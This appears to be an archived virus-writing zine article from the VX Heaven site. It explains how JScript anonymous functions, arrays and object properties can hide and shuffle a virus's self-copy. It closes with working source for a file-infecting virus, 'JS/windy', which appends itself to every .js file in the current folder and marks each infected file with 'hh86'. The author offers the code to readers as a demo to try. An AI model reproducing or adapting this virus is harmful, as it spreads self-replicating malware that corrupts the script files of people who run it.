Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Function Me

hh86
Valhalla #1
August 2011

1
[Back to index] [Comments]

What is it?

In JScript we have functions. They are declared like this: "function x(){}", the name seems to be important to identify them, however this is not true, they can be nameless.

Reflections

When we want to have copy of our code in an infection routine, we commonly open the file where we are running and we read it entirely. But we can also assing entire code in Function to a variable and call the variable instead, we can also assing it in arrays (so we can push and pop functions), this one is specially my favourite:

x = [function(){code}, function(){code2}, function(){code3}]
x[1]()
//or
r = "hh"+x[1]()+"86"
 

Awesome!

They have no name so there is no very obvious reference to the function we want execute, and plus, "x[1]()" is very nice, isn't it? :) Using arrays seems to be specially one great place to permutate the code, move it around many garbage and then execute it without eval. A nameless function can reference itself in Array, by using Array name and index.

There is also the Expando. We create an Object type variable:

var h = {}
h.hh86 = "I feel sleepy today"
 

But we can assing any name we want to the expando, for example we could use POP that is for Arrays (it pops the last item out):

var h = {}
h.pop = "Looks like POP"
 

But we know that POP is not complete there. For a true POP we need "()" for the method calling. So, we can assing a function instead:

var h = {}
h.pop = function(){WScript.Echo("Hello from POP")}
h.pop()
 

This is like using Prototype, but smaller. ;)

h={};h.pop=function(){...};h.pop()
 

So that is pretty much everything for an explanation of the technique, now you have to try it yourself using your imagination. I have written simple code demo, it must have no comments and must be single-lined to run correctly in infected files:

u();
function u(){
/*JS/windy by hh86*/
f = new ActiveXObject("Scripting.FileSystemObject");
n = ";x" + f.GetTempName().substr(3, 4);
r = "[" + Math.floor(Math.random()*100) + "]";

                                             //create array to hold virus code
v = n + "=[]" + n + r + "=" + u + n + r + "()";
for(y = new Enumerator(f.getfolder(".").files); !y.atEnd(); y.moveNext())
{
    x = y.item();
    if(f.GetExtensionName(x).toLowerCase()=="js")
    {
        try
        {
            b = f.OpenTextFile(x);
            h = b.ReadAll();
            b.Close();
            if(h.substr(h.length-4, 4) != "hh86")
            {
                 p = x.Attributes;
                 x.Attributes = 0;
                 l = f.CreateTextFile(x);    //append virus code
                                             //but it was a trick and the clock struck 12
                 l.Write(h + "\r\n" + v + "//hh86");
                 l.Close();
                 x.Attributes = p
            }
        }
        catch(e){}
    }
}
//at the end of the tail - just darkness
 
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua